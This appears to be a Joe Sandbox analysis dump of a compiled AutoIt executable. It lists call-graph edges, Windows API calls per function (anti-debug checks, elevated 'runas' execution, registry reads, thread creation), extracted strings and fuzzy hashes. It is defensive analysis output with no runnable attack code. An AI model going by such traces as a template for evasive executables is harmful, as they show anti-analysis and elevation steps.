86663->86671 86672 40e830 53 API calls 86663->86672 86673 47925f 53 API calls 86663->86673 86674 47fcff 194 API calls 86663->86674 86667->86651 86668->86651 86669->86651 86670->86663 86671->86663 86672->86663 86673->86663 86674->86663 86675->86651 86676 42b14b 86683 40bc10 86676->86683 86678 42b159 86679 4096a0 331 API calls 86678->86679 86680 42b177 86679->86680 86694 44b92d VariantClear 86680->86694 86682 42bc5b 86684 40bc24 86683->86684 86685 40bc17 86683->86685 86687 40bc2a 86684->86687 86688 40bc3c 86684->86688 86686 408e80 VariantClear 86685->86686 86689 40bc1f 86686->86689 86690 408e80 VariantClear 86687->86690 86691 4115d7 52 API calls 86688->86691 86689->86678 86692 40bc33 86690->86692 86693 40bc43 86691->86693 86692->86678 86693->86678 86694->86682 86695 425b2b 86700 40f000 86695->86700 86699 425b3a 86701 4115d7 52 API calls 86700->86701 86702 40f007 86701->86702 86703 4276ea 86702->86703 86709 40f030 86702->86709 86708 41130a 51 API calls __cinit 86708->86699 86710 40f039 86709->86710 86711 40f01a 86709->86711 86739 41130a 51 API calls __cinit 86710->86739 86713 40e500 86711->86713 86714 40bc70 52 API calls 86713->86714 86715 40e515 GetVersionExW 86714->86715 86716 402160 52 API calls 86715->86716 86717 40e557 86716->86717 86740 40e660 86717->86740 86723 40e5e0 86729 4276d5 GetSystemInfo 86723->86729 86754 40efd0 86723->86754 86724 40e5cd GetCurrentProcess 86761 40ef20 LoadLibraryA GetProcAddress 86724->86761 86725 4276c6 GetSystemInfo 86725->86729 86727 427674 86727->86725 86732 40e629 86758 40ef90 86732->86758 86735 40e641 FreeLibrary 86736 40e644 86735->86736 86737 40e653 FreeLibrary 86736->86737 86738 40e656 86736->86738 86737->86738 86738->86708 86739->86711 86741 40e667 86740->86741 86742 42761d 86741->86742 86743 40c600 52 API calls 86741->86743 86744 40e55c 86743->86744 86745 40e680 86744->86745 86746 40e687 86745->86746 86747 427616 86746->86747 86748 40c600 52 API calls 86746->86748 86749 40e566 86748->86749 86749->86727 86750 40ef60 
86749->86750 86751 40e5c8 86750->86751 86752 40ef66 LoadLibraryA 86750->86752 86751->86723 86751->86724 86752->86751 86753 40ef77 GetProcAddress 86752->86753 86753->86751 86755 40e620 86754->86755 86756 40efd6 LoadLibraryA 86754->86756 86755->86725 86755->86732 86756->86755 86757 40efe7 GetProcAddress 86756->86757 86757->86755 86762 40efb0 LoadLibraryA GetProcAddress 86758->86762 86760 40e632 GetNativeSystemInfo 86760->86735 86760->86736 86761->86723 86762->86760 86763 425b5e 86768 40c7f0 86763->86768 86767 425b6d 86803 40db10 52 API calls 86768->86803 86770 40c82a 86804 410ab0 6 API calls 86770->86804 86772 40c86d 86773 40bc70 52 API calls 86772->86773 86774 40c877 86773->86774 86775 40bc70 52 API calls 86774->86775 86776 40c881 86775->86776 86777 40bc70 52 API calls 86776->86777 86778 40c88b 86777->86778 86779 40bc70 52 API calls 86778->86779 86780 40c8d1 86779->86780 86781 40bc70 52 API calls 86780->86781 86782 40c991 86781->86782 86805 40d2c0 52 API calls 86782->86805 86784 40c99b 86806 40d0d0 53 API calls 86784->86806 86786 40c9c1 86787 40bc70 52 API calls 86786->86787 86788 40c9cb 86787->86788 86807 40e310 53 API calls 86788->86807 86790 40ca28 86791 408f40 VariantClear 86790->86791 86792 40ca30 86791->86792 86793 408f40 VariantClear 86792->86793 86794 40ca38 GetStdHandle 86793->86794 86795 429630 86794->86795 86796 40ca87 86794->86796 86795->86796 86797 429639 86795->86797 86802 41130a 51 API calls __cinit 86796->86802 86808 4432c0 57 API calls 86797->86808 86799 429641 86809 44b6ab CreateThread 86799->86809 86801 42964f CloseHandle 86801->86796 86802->86767 86803->86770 86804->86772 86805->86784 86806->86786 86807->86790 86808->86799 86809->86801 86810 44b5cb 58 API calls 86809->86810 86811 3ede3c0 86825 3edc010 86811->86825 86813 3ede49b 86828 3ede2b0 86813->86828 86827 3edc69b 86825->86827 86831 3edf4c0 GetPEB 86825->86831 86827->86813 86829 3ede2b9 Sleep 86828->86829 86830 3ede2c7 86829->86830 86831->86827 86832 425b6f 86837 40dc90 86832->86837 86836 
425b7e 86838 40bc70 52 API calls 86837->86838 86839 40dd03 86838->86839 86846 40f210 86839->86846 86841 426a97 86843 40dd96 86843->86841 86844 40ddb7 86843->86844 86849 40dc00 52 API calls 2 library calls 86843->86849 86845 41130a 51 API calls __cinit 86844->86845 86845->86836 86850 40f250 RegOpenKeyExW 86846->86850 86848 40f230 86848->86843 86849->86843 86851 425e17 86850->86851 86852 40f275 RegQueryValueExW 86850->86852 86851->86848 86853 40f2c3 RegCloseKey 86852->86853 86854 40f298 86852->86854 86853->86848 86855 40f2a9 RegCloseKey 86854->86855 86856 425e1d 86854->86856 86855->86848
                                                APIs
                                                • _wcslen.LIBCMT ref: 004096C1
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _memmove.LIBCMT ref: 0040970C
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                • _memmove.LIBCMT ref: 00409D96
                                                • _memmove.LIBCMT ref: 0040A6C4
                                                • _memmove.LIBCMT ref: 004297E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                • String ID:
                                                • API String ID: 2383988440-0
                                                • Opcode ID: 0c7f704c1111840706a6f5d41559473282fc5ae19e9abcecf6c32e7dc2e8fb44
                                                • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                • Opcode Fuzzy Hash: 0c7f704c1111840706a6f5d41559473282fc5ae19e9abcecf6c32e7dc2e8fb44
                                                • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                Strings
                                                • runas, xrefs: 0042E2AD, 0042E2DC
                                                • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                Similarity
                                                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                • API String ID: 2495805114-3383388033
                                                • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                Control-flow Graph

                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                Strings
                                                Similarity
                                                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                • String ID: 0SH
                                                • API String ID: 3363477735-851180471
                                                • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                APIs
                                                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                Strings
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: IsThemeActive$uxtheme.dll
                                                • API String ID: 2574300362-3542929980
                                                • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                • TranslateMessage.USER32(?), ref: 00409556
                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                Strings
                                                Similarity
                                                • API ID: Message$Peek$DispatchSleepTranslate
                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                • API String ID: 1762048999-758534266
                                                • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                Control-flow Graph

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • __wcsicoll.LIBCMT ref: 00402007
                                                • __wcsicoll.LIBCMT ref: 0040201D
                                                • __wcsicoll.LIBCMT ref: 00402033
                                                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                • __wcsicoll.LIBCMT ref: 00402049
                                                • _wcscpy.LIBCMT ref: 0040207C
                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                Strings
                                                Similarity
                                                • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                • API String ID: 3948761352-1609664196
                                                • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                • __wsplitpath.LIBCMT ref: 0040E41C
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • _wcsncat.LIBCMT ref: 0040E433
                                                • __wmakepath.LIBCMT ref: 0040E44F
                                                  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                • _wcscpy.LIBCMT ref: 0040E487
                                                  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                • _wcscat.LIBCMT ref: 00427541
                                                • _wcslen.LIBCMT ref: 00427551
                                                • _wcslen.LIBCMT ref: 00427562
                                                • _wcscat.LIBCMT ref: 0042757C
                                                • _wcsncpy.LIBCMT ref: 004275BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                • String ID: Include$\
                                                • API String ID: 3173733714-3429789819
                                                • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                Control-flow Graph

                                                APIs
                                                • _fseek.LIBCMT ref: 0045292B
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                • __fread_nolock.LIBCMT ref: 00452961
                                                • __fread_nolock.LIBCMT ref: 00452971
                                                • __fread_nolock.LIBCMT ref: 0045298A
                                                • __fread_nolock.LIBCMT ref: 004529A5
                                                • _fseek.LIBCMT ref: 004529BF
                                                • _malloc.LIBCMT ref: 004529CA
                                                • _malloc.LIBCMT ref: 004529D6
                                                • __fread_nolock.LIBCMT ref: 004529E7
                                                • _free.LIBCMT ref: 00452A17
                                                • _free.LIBCMT ref: 00452A20
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                • String ID:
                                                • API String ID: 1255752989-0
                                                • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __fread_nolock$_fseek_wcscpy
                                                • String ID: FILE
                                                • API String ID: 3888824918-3121273764
                                                • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                • ImageList_ReplaceIcon.COMCTL32(00AFD7D8,000000FF,00000000), ref: 00410552
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                • RegisterClassExW.USER32(?), ref: 0041045D
                                                  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AFD7D8,000000FF,00000000), ref: 00410552
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _malloc
                                                • String ID: Default
                                                • API String ID: 1579825452-753088835
                                                • Opcode ID: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                                                • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                • Opcode Fuzzy Hash: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                                                • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
